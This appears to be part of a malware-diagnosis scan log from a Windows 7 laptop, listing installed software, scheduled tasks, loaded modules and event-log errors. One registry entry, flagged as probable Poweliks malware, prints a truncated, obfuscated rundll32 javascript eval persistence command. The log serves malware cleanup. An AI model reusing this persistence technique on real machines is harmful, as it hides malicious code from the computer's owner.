Microsoft Office Access MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Access Setup Metadata MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Converter Pack (HKLM\...\{6EECB283-E65F-40EF-86D3-D51BF02A8D43}) (Version: 11.0.0.0 - Microsoft Corporation - Office Resource Kit Group)
Microsoft Office Excel MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Home and Student 2010 (HKLM\...\Office14.SingleImage) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Office OneNote MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Outlook MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office PowerPoint MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (French) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (Spanish) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Proofing (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Publisher MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared Setup Metadata MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Single Image 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Small Business Connectivity Components (HKLM\...\{A939D341-5A04-4E0A-BB55-3E65B386432D}) (Version: 2.0.7024.0 - Microsoft Corporation)
Microsoft Office Suite Activation Assistant (HKLM\...\{E50AE784-FABE-46DA-A1F8-7B6B56DCB22E}) (Version: 2.9 - Microsoft Corporation)
Microsoft Office Word MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Security Client (Version: 4.6.0305.0 - Microsoft Corporation) Hidden
Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.6.305.0 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft SQL Server 2005 (HKLM\...\Microsoft SQL Server 2005) (Version:  - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft SQL Server 2005 Express Edition (MSSMLBIZ) (Version: 9.4.5000.00 - Microsoft Corporation) Hidden
Microsoft SQL Server 2005 Express Edition (SQLEXPRESS) (Version: 9.4.5000.00 - Microsoft Corporation) Hidden
Microsoft SQL Server 2005 Tools Express Edition (Version: 9.4.5000.00 - Microsoft Corporation) Hidden
Microsoft SQL Server Native Client (HKLM\...\{7670D32F-DAE6-4E49-8C8B-B3F08B5B1686}) (Version: 9.00.5000.00 - Microsoft Corporation)
Microsoft SQL Server Setup Support Files (English) (HKLM\...\{53F5C3EE-05ED-4830-994B-50B2F0D50FCE}) (Version: 9.00.5000.00 - Microsoft Corporation)
Microsoft SQL Server VSS Writer (HKLM\...\{E7084B89-69E0-46B3-A118-8F99D06988CD}) (Version: 9.00.5000.00 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053 (HKLM\...\{770657D0-A123-3C07-8E44-1C83EC895118}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
MSVCRT (Version: 14.0.1468.721 - Microsoft) Hidden
MSXML 4.0 SP2 (KB954430) (HKLM\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
PhotoScape (HKLM\...\PhotoScape) (Version:  - )
PlayReady PC Runtime x86 (HKLM\...\{CCA5EAAD-92F4-4B7A-B5EE-14294C66AB61}) (Version: 1.3.0 - Microsoft Corporation)
QuickTime (HKLM\...\{57752979-A1C9-4C02-856B-FBB27AC4E02C}) (Version: 7.69.80.9 - Apple Inc.)
Realtek USB 2.0 Card Reader (HKLM\...\{96AE7E41-E34E-47D0-AC07-1091A8127911}) (Version: 6.1.7600.30111 - Realtek Semiconductor Corp.)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version:  - Microsoft)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (Version:  - Microsoft) Hidden
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 15.0.8.1 - Synaptics Incorporated)
System Requirements Lab for Intel (HKLM\...\{CD41B576-4787-4D5C-95EE-24A4ABD89CD3}) (Version: 4.4.24.0 - Husdawg, LLC)
TeamViewer 6 (HKLM\...\TeamViewer 6) (Version: 6.0.17222 - TeamViewer GmbH)
TOSHIBA ConfigFree (HKLM\...\{607BE7BF-7C28-4ADB-A4A0-385962B901C3}) (Version: 8.0.28 - TOSHIBA Corporation)
TOSHIBA Disc Creator (HKLM\...\{5DA0E02F-970B-424B-BF41-513A5018E4C0}) (Version: 2.1.0.2 - TOSHIBA Corporation)
TOSHIBA eco Utility (HKLM\...\InstallShield_{53536479-DFB0-47ED-9D10-43F3708C222D}) (Version: 1.2.10.0 - TOSHIBA Corporation)
TOSHIBA eco Utility (Version: 1.2.10.0 - TOSHIBA Corporation) Hidden
TOSHIBA Hardware Setup (HKLM\...\{8E9CEA3B-EBD1-439C-A01D-830CB39613C6}) (Version: 2.00.06 - TOSHIBA Corporation)
TOSHIBA HDD/SSD Alert (HKLM\...\InstallShield_{D4322448-B6AF-4316-B859-D8A0E84DCB38}) (Version: 3.1.0.6 - TOSHIBA Corporation)
TOSHIBA HDD/SSD Alert (Version: 3.1.0.6 - TOSHIBA Corporation) Hidden
TOSHIBA Media Controller (HKLM\...\{C7A4F26F-F9B0-41B2-8659-99181108CDE3}) (Version: 1.0.80.3 - TOSHIBA CORPORATION)
TOSHIBA Media Controller Plug-in (HKLM\...\{F26FDF57-483E-42C8-A9C9-EEE1EDB256E0}) (Version: 1.0.5.10 - TOSHIBA CORPORATION)
TOSHIBA Recovery Media Creator (HKLM\...\{B65BBB06-1F8E-48F5-8A54-B024A9E15FDF}) (Version: 2.1.0.4 - TOSHIBA Corporation)
TOSHIBA Service Station (HKLM\...\{AC6569FA-6919-442A-8552-073BE69E247A}) (Version: 2.2.9 - TOSHIBA)
TOSHIBA Software Modem (HKLM\...\TOSHIBA Software Modem) (Version: 2.2.97 - LSI Corporation)
TOSHIBA Speech System Applications (HKLM\...\{EE033C1F-443E-41EC-A0E2-559B539A4E4D}) (Version: 1.00.2518 - )
TOSHIBA Speech System SR Engine(U.S.) Version1.0 (HKLM\...\{008D69EB-70FF-46AB-9C75-924620DF191A}) (Version:  - )
TOSHIBA Speech System TTS Engine(U.S.) Version1.0 (HKLM\...\{3FBF6F99-8EC6-41B4-8527-0A32241B5496}) (Version:  - )
TOSHIBA Supervisor Password (HKLM\...\{073B89C3-BA88-41B5-965F-B35A88EAE838}) (Version: 2.00.03 - TOSHIBA Corporation)
TOSHIBA Value Added Package (HKLM\...\InstallShield_{FEDD27A0-B306-45EF-BF58-B527406B42C8}) (Version: 1.3.3 - TOSHIBA Corporation)
TOSHIBA Value Added Package (Version: 1.3.3 - TOSHIBA Corporation) Hidden
TOSHIBA Web Camera Application (HKLM\...\{5E6F6CF3-BACC-4144-868C-E14622C658F3}) (Version: 1.1.1.15 - TOSHIBA Corporation)
Update for Microsoft .NET Framework 4 Client Profile (KB2468871) (HKLM\...\{3C3901C5-3455-3E0A-A214-0B093A5070A6}.KB2468871) (Version: 1 - Microsoft Corporation)
Update for Microsoft .NET Framework 4 Client Profile (KB2533523) (HKLM\...\{3C3901C5-3455-3E0A-A214-0B093A5070A6}.KB2533523) (Version: 1 - Microsoft Corporation)
Update for Microsoft .NET Framework 4 Client Profile (KB2600217) (HKLM\...\{3C3901C5-3455-3E0A-A214-0B093A5070A6}.KB2600217) (Version: 1 - Microsoft Corporation)
Update for Microsoft Access 2010 (KB2553446) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{B4A38370-2ADB-46B0-A1B0-0C4A2F7DCA31}) (Version:  - Microsoft)
Update for Microsoft Excel 2010 (KB2889836) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{9179FC17-97A8-4D98-9E09-05720AF5D44E}) (Version:  - Microsoft)
Update for Microsoft Filter Pack 2.0 (KB2878281) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{302A8FE3-EBF5-486C-A431-16A1CD914443}) (Version:  - Microsoft)
Update for Microsoft InfoPath 2010 (KB2817369) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{4EEA3D3E-989C-4DF4-AB0A-3042C0C12AA3}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2494150) (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{3FCFD88F-4D13-4F38-8625-ABABEA7F61EA}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2589298) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{DADF7E25-FFA4-4D02-BE84-1DAE62C18516}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2589352) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{F4284D93-7AE8-4309-8CF3-9AD394F35F3A}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2589375) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{287A1E92-9E41-4BC1-8920-B3D0E9220800}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2597087) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{9D69691D-823D-4C3E-9B12-563A3F520366}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2687502) 32-Bit Edition (HKLM\...\{90140000-001F-0409-0000-0000000FF1CE}_Office14.SingleImage_{7DE7DF97-82FE-4B3A-AB8D-1621F9CC464A}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2760598) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{ECFE33A3-B8B7-439A-ADE4-59FBD29EF9B8}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2760631) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{35698CB7-AAA2-4577-B505-DBFF504AEF23}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2794737) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{5AA578BB-759C-40FD-9661-A737C0884541}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2825635) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{F1A20C69-9FE5-40FD-9CD5-84EABC2EF64A}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2837581) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{334FB202-28D7-4BA4-8BC9-4FE4AB233EA0}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2837606) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{B0D672F7-883E-4279-8E75-D97A5445AB46}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2878252) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{B0DB9F71-E0F7-4FE6-8925-35B860CAC0C4}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2881028) 32-Bit Edition (HKLM\...\{90140000-001F-040C-0000-0000000FF1CE}_Office14.SingleImage_{089DBFD7-8211-43B2-AAAE-5BDD8C23E3A8}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2881028) 32-Bit Edition (HKLM\...\{90140000-001F-0C0A-0000-0000000FF1CE}_Office14.SingleImage_{794A0574-4E2F-4D58-B2A0-D7460ACDC85C}) (Version:  - Microsoft)
Update for Microsoft OneNote 2010 (KB2837595) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{51CCA922-A0CC-47C4-8910-6936D97CAC2E}) (Version:  - Microsoft)
Update for Microsoft Outlook 2010 (KB2687567) 32-Bit Edition (HKLM\...\{90140000-001A-0409-0000-0000000FF1CE}_Office14.SingleImage_{DCE104A1-1875-4469-A83D-A5BFA6C4640F}) (Version:  - Microsoft)
Update for Microsoft Outlook 2010 (KB2687567) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{2AB483F1-C86E-427A-83B4-23889B03512D}) (Version:  - Microsoft)
Update for Microsoft PowerPoint 2010 (KB2837579) 32-Bit Edition (HKLM\...\{90140000-0018-0409-0000-0000000FF1CE}_Office14.SingleImage_{334AA0A1-2BB1-4D74-B66A-2B2C4D9C2C87}) (Version:  - Microsoft)
Update for Microsoft PowerPoint 2010 (KB2837579) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{2BA40F82-F3A4-441C-BF1A-ED4C42FF4872}) (Version:  - Microsoft)
Update for Microsoft Visio 2010 (KB2880526) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{7B29D8B8-6A87-496C-A65E-B935E740448A}) (Version:  - Microsoft)
Update for Microsoft Visio Viewer 2010 (KB2837587) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{38CF30E4-3348-4BD1-A859-B630C355A56F}) (Version:  - Microsoft)
Update for Microsoft Word 2010 (KB2880529) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{B9B89E01-5B6B-4F73-BC34-B2C0D8ACB4CD}) (Version:  - Microsoft)
Windows Live Call (Version: 14.0.8117.0416 - Microsoft Corporation) Hidden
Windows Live Communications Platform (Version: 14.0.8117.416 - Microsoft Corporation) Hidden
Windows Live Essentials (HKLM\...\WinLiveSuite_Wave3) (Version: 14.0.8117.0416 - Microsoft Corporation)
Windows Live Essentials (Version: 14.0.8117.416 - Microsoft Corporation) Hidden
Windows Live ID Sign-in Assistant (HKLM\...\{0840B4D6-7DD1-4187-8523-E6FC0007EFB7}) (Version: 6.500.3165.0 - Microsoft Corporation)
Windows Live Mail (Version: 14.0.8117.0416 - Microsoft Corporation) Hidden
Windows Live Messenger (Version: 14.0.8117.0416 - Microsoft Corporation) Hidden
Windows Live Movie Maker (Version: 14.0.8117.0416 - Microsoft Corporation) Hidden
Windows Live Photo Gallery (Version: 14.0.8117.416 - Microsoft Corporation) Hidden
Windows Live Sync (HKLM\...\{B10914FD-8812-47A4-85A1-50FCDE7F1F33}) (Version: 14.0.8117.416 - Microsoft Corporation)
Windows Live Upload Tool (HKLM\...\{205C6BDD-7B73-42DE-8505-9A093F35A238}) (Version: 14.0.8014.1029 - Microsoft Corporation)
Windows Live Writer (Version: 14.0.8117.0416 - Microsoft Corporation) Hidden
 
==================== Custom CLSID (selected items): ==========================
 
(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)
 
CustomCLSID: HKU\S-1-5-21-931387415-1679961563-2565028958-1004_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
 
==================== Restore Points  =========================
 
07-09-2014 01:28:19 Windows 7 Service Pack 1
07-09-2014 11:17:53 Windows Update
08-09-2014 02:19:37 Windows Update
08-09-2014 11:25:59 Windows Update
09-09-2014 06:43:28 Installed Adblock Plus for IE (32-bit)
09-09-2014 06:56:14 Malwarebytes Anti-Rootkit Restore Point
09-09-2014 19:00:13 Windows Update
10-09-2014 11:39:30 Windows Update
11-09-2014 11:02:04 Windows Update
 
==================== Hosts content: ==========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2009-07-14 10:04 - 2009-06-11 05:39 - 00000824 ____A C:\windows\system32\Drivers\etc\hosts
 
==================== Scheduled Tasks (whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)
 
Task: {0600C6CD-339E-40E5-837D-772661A93D2E} - System32\Tasks\{47BE60EA-15BF-417B-8455-8082DD3AA6C9} => C:\Program Files\Canon\SolutionMenu\CNSLMAIN.EXE [2009-09-04] (CANON INC.)
Task: {0B0DCD61-E65B-41BD-87A5-E3FF4E52896D} - System32\Tasks\{2E3D8B46-8C0C-4CE5-BD72-9EA8BF2819A4} => C:\Program Files\Canon\SolutionMenu\CNSLMAIN.EXE [2009-09-04] (CANON INC.)
Task: {0E809153-173D-4501-9AA3-E3299B8E4EEB} - System32\Tasks\{6446B742-20A7-4A87-91FB-1DAF36B20FDE} => C:\Program Files\Canon\IJ Manual\Easy Guide Viewer\cmview.exe [2009-08-06] (CANON INC.)
Task: {131204F4-96CD-4DA3-BE7A-816280B2F3AB} - System32\Tasks\{88F08FA9-BE71-4A64-979B-251F068C947A} => C:\Program Files\Canon\IJ Manual\Easy Guide Viewer\cmview.exe [2009-08-06] (CANON INC.)
Task: {3655B183-5D27-422D-9FD5-CB1638615759} - System32\Tasks\{35038549-A0E9-41DD-B0FC-39A9B0A1194D} => C:\Program Files\Canon\IJ Manual\Easy Guide Viewer\cmview.exe [2009-08-06] (CANON INC.)
Task: {48A8BE75-28FC-45FC-A2E4-BFBF99AB848F} - System32\Tasks\{E274B4A1-AFB4-49EA-BF80-7ACE438DC09F} => C:\Program Files\Canon\SolutionMenu\CNSLMAIN.EXE [2009-09-04] (CANON INC.)
Task: {67B5FCE5-D76F-44AC-A382-B1B5E874D085} - System32\Tasks\{3B5FF27F-F004-4707-A208-EAF4518D4AC7} => C:\Program Files\Canon\IJ Manual\Easy Guide Viewer\cmview.exe [2009-08-06] (CANON INC.)
Task: {69ACD1BB-0C0D-4370-BBB9-8E8D07A61169} - System32\Tasks\Microsoft_Hardware_Launch_IPoint_exe => c:\Program Files\Microsoft IntelliPoint\IPoint.exe [2010-07-21] (Microsoft Corporation)
Task: {77F07B0E-D155-4273-A665-FD20F9C0B9B7} - System32\Tasks\ConfigFree Startup Programs => C:\Program Files\TOSHIBA\ConfigFree\NDSTray.exe [2010-02-23] (TOSHIBA CORPORATION)
Task: {81532BAB-54D1-4201-941B-AF6D56C850A4} - System32\Tasks\{F810B7E8-5B48-4A60-BF3B-7EED4E944DA3} => C:\Program Files\Canon\SolutionMenu\CNSLMAIN.EXE [2009-09-04] (CANON INC.)
Task: {8987DC76-A8B3-49B2-A0BB-072667F6A7AE} - System32\Tasks\{0443CAD0-DB77-4C07-86A1-3FE551E42396} => C:\Program Files\Canon\IJ Manual\Easy Guide Viewer\cmview.exe [2009-08-06] (CANON INC.)
Task: {976A4408-8F64-4C97-B073-CD2D16E60C09} - \{08BD5BC0-2D8E-7335-9F1F-3215372B580F} No Task File <==== ATTENTION
Task: {9ECA6E1B-A776-4C9B-B04A-A87D8E24AFAB} - System32\Tasks\{DC76CA08-A16E-427C-ABBC-3E5C759C3EA6} => C:\Program Files\Canon\MP Navigator EX 3.1\mpnex31.exe [2009-11-09] (CANON INC.)
Task: {A264B53A-C76E-4EF8-A314-785501361D1E} - System32\Tasks\{9D54E60D-393D-4FD2-96B6-96A73B3AF2D9} => C:\Program Files\Canon\MP Navigator EX 3.1\mpnex31.exe [2009-11-09] (CANON INC.)
Task: {B714418F-4FFB-4571-BE0E-0838A402499C} - System32\Tasks\Adobe Flash Player Updater => C:\windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2013-04-27] (Adobe Systems Incorporated)
Task: {CE67E4A0-0B09-4CF4-8D12-2080226E2384} - System32\Tasks\{928F0CFC-9063-46E2-BD07-C6585B0230DC} => C:\Program Files\Canon\MP Navigator EX 3.1\mpnex31.exe [2009-11-09] (CANON INC.)
Task: {E331DF70-0764-4282-9BBA-EEB4DE041C73} - System32\Tasks\{F687F45B-D1DB-4FA4-BD38-ED30604C0A48} => C:\Program Files\Canon\IJ Manual\Easy Guide Viewer\cmview.exe [2009-08-06] (CANON INC.)
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\windows\Tasks\Adobe Flash Player Updater.job => C:\windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe
 
==================== Loaded Modules (whitelisted) =============
 
2006-12-04 01:25 - 2006-12-04 01:25 - 00022723 _____ () C:\windows\System32\sugs2l3.dll
2010-03-04 05:14 - 2010-03-04 05:14 - 08783160 _____ () C:\Program Files\TOSHIBA\FlashCards\BlackPng.dll
2009-11-04 04:26 - 2009-11-04 04:26 - 00058680 _____ () C:\Program Files\TOSHIBA\FlashCards\Hotkey\FnZ.dll
2010-03-04 05:14 - 2010-03-04 05:14 - 00016184 _____ () C:\Program Files\TOSHIBA\FlashCards\Hotkey\FnF10.dll
2010-03-04 05:14 - 2010-03-04 05:14 - 00016184 _____ () C:\Program Files\TOSHIBA\FlashCards\Hotkey\FnF11.dll
2009-03-13 10:08 - 2009-03-13 10:08 - 00049152 _____ () C:\Program Files\Toshiba\PCDiag\NotifyPCD.dll
2009-07-26 02:07 - 2009-07-26 02:07 - 00058704 _____ () C:\Program Files\TOSHIBA\TOSHIBA Disc Creator\NotifyTDC.dll
2010-11-17 13:16 - 2010-11-17 13:16 - 00067872 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2009-10-14 01:00 - 2009-10-14 01:00 - 00016384 ____R () C:\Program Files\ATI Technologies\ATI.ACE\Branding\Branding.dll
2010-11-03 08:46 - 2010-11-03 08:46 - 00270336 _____ () C:\windows\assembly\GAC_MSIL\CLI.Aspect.CrossDisplay.Graphics.Dashboard\1.0.0.0__90ba9c70f846762e\CLI.Aspect.CrossDisplay.Graphics.Dashboard.dll
2013-01-11 18:27 - 2013-01-11 18:27 - 00172544 _____ () C:\windows\assembly\NativeImages_v2.0.50727_32\IsdiInterop\72d7ad1c7236c618e32950b49869a26b\IsdiInterop.ni.dll
2011-12-01 10:49 - 2011-10-17 15:08 - 00059904 _____ () C:\Program Files\Intel\Intel® Rapid Storage Technology\IsdiInterop.dll
 
==================== Alternate Data Streams (whitelisted) =========
 
(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)
 
AlternateDataStreams: C:\Users\hesperia\Documents\Invites.eml:OECustomProperty
 
==================== Safe Mode (whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
 
==================== EXE Association (whitelisted) =============
 
(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)
 
 
==================== MSCONFIG/TASK MANAGER disabled items =========
 
(Currently there is no automatic fix for this section.)
 
 
==================== Faulty Device Manager Devices =============
 
Name: Broadcom 802.11n Network Adapter
Description: Broadcom 802.11n Network Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Broadcom
Service: BCM43XX
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (09/12/2014 09:49:07 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: svchost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc100
Faulting module name: ieframe.dll, version: 9.0.8112.16476, time stamp: 0x5126ea2b
Exception code: 0xc0000005
Fault offset: 0x0000ccc9
Faulting process id: 0x16b4
Faulting application start time: 0xsvchost.exe0
Faulting application path: svchost.exe1
Faulting module path: svchost.exe2
Report Id: svchost.exe3
 
Error: (09/12/2014 09:46:15 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: regsvr32.exe, version: 6.1.7600.16385, time stamp: 0x4a5bca28
Faulting module name: ntdll.dll, version: 6.1.7600.16915, time stamp: 0x4ec49caf
Exception code: 0xc0000029
Fault offset: 0x0008df89
Faulting process id: 0x1688
Faulting application start time: 0xregsvr32.exe0
Faulting application path: regsvr32.exe1
Faulting module path: regsvr32.exe2
Report Id: regsvr32.exe3
 
Error: (09/12/2014 09:46:07 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: Explorer.EXE, version: 6.1.7600.16768, time stamp: 0x4d6878c3
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0xffb4e0b3
Faulting process id: 0x8d0
Faulting application start time: 0xExplorer.EXE0
Faulting application path: Explorer.EXE1
Faulting module path: Explorer.EXE2
Report Id: Explorer.EXE3
 
Error: (09/12/2014 09:38:25 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: svchost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc100
Faulting module name: ieframe.dll, version: 9.0.8112.16476, time stamp: 0x5126ea2b
Exception code: 0xc0000005
Fault offset: 0x0000ccc6
Faulting process id: 0x594
Faulting application start time: 0xsvchost.exe0
Faulting application path: svchost.exe1
Faulting module path: svchost.exe2
Report Id: svchost.exe3
 
Error: (09/12/2014 09:06:03 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: svchost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc100
Faulting module name: ieframe.dll, version: 9.0.8112.16476, time stamp: 0x5126ea2b
Exception code: 0xc0000005
Fault offset: 0x0000ccc9
Faulting process id: 0x15cc
Faulting application start time: 0xsvchost.exe0
Faulting application path: svchost.exe1
Faulting module path: svchost.exe2
Report Id: svchost.exe3
 
Error: (09/11/2014 07:02:18 PM) (Source: MsiInstaller) (EventID: 1024) (User: NT AUTHORITY)
Description: Product: Microsoft Office 2007 Primary Interop Assemblies - Update 'Security Update for Microsoft Office PowerPoint 2007 (KB2596764) 32-Bit Edition' could not be installed. Error code 1603. Windows Installer can create logs to help troubleshoot issues with installing software packages. Use the following link for instructions on turning on logging support: http://go.microsoft.com/fwlink/?LinkId=23127
 
Error: (09/11/2014 07:02:18 PM) (Source: MsiInstaller) (EventID: 10005) (User: NT AUTHORITY)
Description: Product: Microsoft Office 2007 Primary Interop Assemblies -- Please install Microsoft Office 2007 before installing this product.
 
Error: (09/11/2014 07:01:45 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: svchost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc100
Faulting module name: ieframe.dll, version: 9.0.8112.16476, time stamp: 0x5126ea2b
Exception code: 0xc0000005
Fault offset: 0x0000ccc9
Faulting process id: 0x176c
Faulting application start time: 0xsvchost.exe0
Faulting application path: svchost.exe1
Faulting module path: svchost.exe2
Report Id: svchost.exe3
 
Error: (09/11/2014 05:45:31 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: svchost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc100
Faulting module name: ieframe.dll, version: 9.0.8112.16476, time stamp: 0x5126ea2b
Exception code: 0xc0000005
Fault offset: 0x0000ccc9
Faulting process id: 0x11c4
Faulting application start time: 0xsvchost.exe0
Faulting application path: svchost.exe1
Faulting module path: svchost.exe2
Report Id: svchost.exe3
 
Error: (09/11/2014 05:36:49 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: svchost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc100
Faulting module name: ieframe.dll, version: 9.0.8112.16476, time stamp: 0x5126ea2b
Exception code: 0xc0000005
Fault offset: 0x0000ccc9
Faulting process id: 0x904
Faulting application start time: 0xsvchost.exe0
Faulting application path: svchost.exe1
Faulting module path: svchost.exe2
Report Id: svchost.exe3
 
 
System errors:
=============
Error: (09/12/2014 03:13:04 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (09/12/2014 01:11:09 PM) (Source: DCOM) (EventID: 10010) (User: )
